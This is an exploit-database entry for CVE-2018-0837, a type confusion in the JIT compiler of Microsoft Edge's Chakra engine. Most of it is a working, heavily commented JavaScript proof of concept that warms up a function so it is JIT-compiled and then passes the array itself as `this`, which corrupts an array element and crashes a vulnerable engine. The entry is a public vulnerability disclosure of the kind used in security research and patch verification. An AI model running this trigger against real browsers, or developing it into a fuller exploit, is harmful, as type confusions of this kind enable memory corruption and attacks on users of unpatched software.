
Microsoft Edge Chakra JIT - 'LdThis' Type Confusion

Author: Google Security Research
type: dos
platform: windows
port: 
date_added: 2018-02-15 
date_updated: 2018-02-15 
verified: 1 
codes: CVE-2018-0837 
tags: Type Confusion
aliases:  
screenshot_url:  
application_url: 

/*
The JIT assumes the value type of an `LdThis` instruction is a definite "Object". Since `this` can be another kind of object, such as an array, it must instead be treated as "LikelyObject"; otherwise operations on `this` are not checked properly — in the PoC below, the store through `this` is emitted without the type check that would account for `this` aliasing the array passed as `arr`. Running this against a vulnerable engine (Edge / ChakraCore before the CVE-2018-0837 fix) is expected to crash the process, hence `type: dos` above.

PoC:
*/

/*
 * Function meant to be JIT-compiled by repeated calls from main().
 * The three stores are in a deliberate order and must not be reordered,
 * merged or simplified — the PoC depends on this exact sequence:
 *   1. `arr[0] = 1.1`         - a double store into `arr`.
 *   2. `this[0] = {}`         - an object store through `this`. Per the bug
 *                               description above, the JIT types `this` as a
 *                               definite "Object" instead of "LikelyObject",
 *                               so the store is not checked properly; when
 *                               the caller passes the array itself as `this`
 *                               (main() does, once, after warm-up), this store
 *                               aliases `arr`.
 *   3. `arr[0] = 2.3023e-320` - a second double store into `arr`, which the
 *                               JIT presumably still treats as holding raw
 *                               doubles even though step 2 may have changed it.
 * NOTE(review): the denormal constant is presumably chosen so that its raw
 * bit pattern is a small integer-like value once written into a slot that,
 * after step 2, holds an object reference — confirm against the engine.
 * The crash itself surfaces later, when main() reads `arr` back.
 */
function opt(arr) {
    arr[0] = 1.1;
    this[0] = {};
    arr[0] = 2.3023e-320;
}

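/*
 * Drives the PoC: warms `opt` up until it is JIT-compiled with a plain
 * object as `this`, then calls it once with the array as `this` so the
 * unchecked store through `this` aliases `arr`. Reading `arr` back
 * afterwards is what triggers the crash on a vulnerable engine.
 *
 * `print` only exists in the ChakraCore shell (ch.exe); outside it the
 * original PoC died with a ReferenceError before exercising the bug, so we
 * fall back to console.log when `print` is not a function. The warm-up
 * count and the shape of the two `opt.call` invocations are part of the
 * trigger and are left exactly as in the original.
 */
function main() {
    const arr = [1.1];
    // Warm-up: `this` is always a fresh plain object here, so the JIT
    // specializes `opt` on `this` being an ordinary Object (see the bug note).
    for (let i = 0; i < 10000; i++) {
        opt.call({}, arr);
    }

    // Single call with the array itself as `this`: the store through `this`
    // and the stores into `arr` now hit the same object.
    opt.call(arr, arr);

    // Reading the array back surfaces the corrupted element.
    const emit = typeof print === 'function' ? print : console.log;
    emit(arr);
}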

// Entry point: run the PoC (expected to crash a vulnerable engine).
main();